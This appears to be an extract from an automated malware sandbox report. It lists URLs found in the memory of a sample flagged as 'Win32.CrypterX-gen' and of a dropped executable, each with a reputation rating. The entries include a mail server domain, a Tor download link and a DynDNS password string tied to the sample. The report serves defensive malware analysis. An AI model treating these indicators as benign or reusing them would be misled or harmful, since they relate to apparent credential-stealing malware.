http://www.fontbureau.comgrita | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271209683.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271153816.0000000005A51000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.coms-P | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ascendercorp.com/typedesigners.html/ | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268958128.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268838022.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comd-- | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.comB.TTF | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/d | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265019576.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264911934.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comrsiv_-l | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comasF;- | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.comml-Y | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com%( | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270302429.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270410317.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270179920.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270233958.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.urwpp.deDPlease | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.de | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273210069.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270890643.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273295422.0000000005A48000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com.TTF | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comalsd | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/H-u | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/ | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274806173.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comF | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.strictfacilityservices.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/P | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/;- | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.comdfSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.comcomtSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/jp/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 
00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comdSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273916785.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.urwpp.deegSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.comd&-cSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.founder.com.cn/cnSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.comoituSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/tSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272325014.0000000005A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cno.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265582317.0000000005A57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
